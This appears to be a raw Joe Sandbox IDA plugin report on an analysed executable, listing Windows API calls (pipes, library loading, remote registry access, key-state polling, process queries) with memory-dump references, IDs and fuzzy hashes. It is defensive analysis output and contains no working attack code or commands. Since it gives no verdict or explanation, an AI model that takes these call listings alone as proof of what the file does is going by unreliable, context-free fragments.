                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F2915C
                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00F29163
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F29178
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F29180
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                                                      • Opcode ID: efedece149c71c8588314feb4b8d4bea62b909a36f691f97f8d202db1dad29fb
                                                                                                                                                                                                                                                      • Instruction ID: 8949aa07c2bd6b718e4243c174d4ee64fa6bbc4c3cb5aa4816d1598cfea7d479
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efedece149c71c8588314feb4b8d4bea62b909a36f691f97f8d202db1dad29fb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20218E7160821ABBEF104E65AC85EBA37ADFB99374F100619F95493190C7B1DC62B760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00F09588
                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F095B9
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00F095CB
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F09605
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                                                      • Opcode ID: 92d868a655af56209cf6b866c4b65108d930bfcbd46ecc9c4c881eee1cddbbe1
                                                                                                                                                                                                                                                      • Instruction ID: 181e3a3382bc56d36e3245b0ebdee05ae383ac9a33de41d3dfbf997e846191ac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92d868a655af56209cf6b866c4b65108d930bfcbd46ecc9c4c881eee1cddbbe1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06219275904209ABEB219F26DC05AAA77F8AF55720F244A19FCA1D72D1E7B0D940FB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F09653
                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F09683
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F09694
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F096CE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                                                      • Opcode ID: e009921b16d8e690a87549b054b40959e8110e4c40209127461b876b122c66b8
                                                                                                                                                                                                                                                      • Instruction ID: e61e318a1ac720236bf5afb935ebbe9581c2b6dbc9afe20fbb0e4ca6a214cce7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e009921b16d8e690a87549b054b40959e8110e4c40209127461b876b122c66b8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5219075A04209ABDB209F699C04E9A77A8AF55734F200A19FCB1D32D1F7F29941FB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F0DB0A
                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F0DB5E
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0DB77
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F5DC00), ref: 00F0DBB5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                                                                                                                                                      • Opcode ID: c4c0f0bc515f9ce12cb24a3957b91b29fbbe3c5319a62a93efa9f48c6c5c186c
                                                                                                                                                                                                                                                      • Instruction ID: 959523f5957f5dd39cc0eb9a03552221ebd56285b260911916488d0220cbbc32
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4c0f0bc515f9ce12cb24a3957b91b29fbbe3c5319a62a93efa9f48c6c5c186c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2216875600148AFCB10EF95CD85E9EBBF8EF89704B104069F909E7351DB71EA41EB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EFC84A
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFC85D
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC82D: GetCurrentThreadId.KERNEL32 ref: 00EFC864
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC82D: AttachThreadInput.USER32(00000000), ref: 00EFC86B
                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00EFCA05
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC876: GetParent.USER32(?), ref: 00EFC884
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EFCA4E
                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00EFCAC4), ref: 00EFCA76
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EFCA90
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                                      • API String ID: 3187004680-1110647743
                                                                                                                                                                                                                                                      • Opcode ID: 17ff5470b5061916b4e7cba68dcf58144130f2e5e031d90e37b7efc56e94b1ca
                                                                                                                                                                                                                                                      • Instruction ID: 34f48126ba2138ddfe1a0a010b51ed98818913243024e130e0fd14ba0e082df6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17ff5470b5061916b4e7cba68dcf58144130f2e5e031d90e37b7efc56e94b1ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8711D27160020C6BDB05BF608D85FFE37A8AF44704F209066FF09BA182CB70A546DB71
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F219F3
                                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F21A26
                                                                                                                                                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F21B49
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00F21BBF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2364364464-0
                                                                                                                                                                                                                                                      • Opcode ID: a40c6aa5973733b9746c659877842237004f4dc8dcee76bfbfac5b1142de1cc4
                                                                                                                                                                                                                                                      • Instruction ID: dc94319189f6046c0b9081a9e4751cf460ae2a7b17dbcab066d94d234eb22642
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a40c6aa5973733b9746c659877842237004f4dc8dcee76bfbfac5b1142de1cc4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD81B174A00214ABDF109F64C886BAEBBF5FF58720F04845AF905BF382D7B5AD419B90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F01CB4
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 00F01D26
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 00F01D81
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F01DF8
                                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F01E26
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                                                                                                      • Opcode ID: dbefa50e8bddcecdac40b8431afb26b8e0c0a721010d35008e23ebbafee5b46c
                                                                                                                                                                                                                                                      • Instruction ID: af48a194967ec19e96040e1379babb187300d0f848cd0f2203fed9ce63ab7d0b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbefa50e8bddcecdac40b8431afb26b8e0c0a721010d35008e23ebbafee5b46c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF5168B5A00209EFDB14CF58C884AAAB7B8FF8D314B158559ED49DB350E330EA51DFA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F206EE
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00F2077D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F2079B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00F207E1
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F207FB
                                                                                                                                                                                                                                                        • Part of subcall function 00EDE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F0A574,?,?,00000000,00000008), ref: 00EDE675
                                                                                                                                                                                                                                                        • Part of subcall function 00EDE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F0A574,?,?,00000000,00000008), ref: 00EDE699
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 327935632-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b78c3f6e77acb8e148599db8f78786b5a58deef8e8bdf0b6e847ae5beb624f4
                                                                                                                                                                                                                                                      • Instruction ID: fdb8ff2644f43274e083977ca4799d0eeee55c8ec8edddac50cc4465e960ab42
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b78c3f6e77acb8e148599db8f78786b5a58deef8e8bdf0b6e847ae5beb624f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A516B76A00219DFCB00EFA8D985EADB7F5FF59310B148069E915AB352DB31ED42DB80
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F22EEF
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F22F2E
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F22F75
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00F22FA1
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F22FAE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3740051246-0
                                                                                                                                                                                                                                                      • Opcode ID: bd20bc7f6de13d932148cf8d04355ec1df3ffe2824774b875f9739c758c071ff
                                                                                                                                                                                                                                                      • Instruction ID: 49826db610b85fd814be0e80c97b0573128da76134fbc8710059f4bfe54f5119
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd20bc7f6de13d932148cf8d04355ec1df3ffe2824774b875f9739c758c071ff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0516872208204AFC704EF68CD91F6ABBF8BF88314F04482DF595972A1DB35E905EB52
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 143aa005c8f894551e94d577d9034033e7e148c3311f39a522b877f9fad0b02e
                                                                                                                                                                                                                                                      • Instruction ID: 1915c3061c6919050118262d6cc8f518c824a51c6ad0be8c7a3a7dc288a82160
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 143aa005c8f894551e94d577d9034033e7e148c3311f39a522b877f9fad0b02e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD41B63AD00528ABC710DB68DC44FAD7B68FB09360F550265F969A72E1D770AD01F6D0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F112B4
                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F112DD
                                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F1131C
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F11341
                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F11349
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1389676194-0
                                                                                                                                                                                                                                                      • Opcode ID: 7f053fd9020ca9c45e476efcedec42f1dd181c3a757235246be7bafb84446a0c
                                                                                                                                                                                                                                                      • Instruction ID: b8189a6bd3906f91048f80f1688267fd55a80164f3a3c639a71187cdba32e8ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f053fd9020ca9c45e476efcedec42f1dd181c3a757235246be7bafb84446a0c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95410C35A00105DFCB01EF64CA95EAEBBF5FF49310B148099E91AAB3A2CB31ED41DB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(000000FF), ref: 00EDB64F
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 00EDB66C
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00EDB691
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00EDB69F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
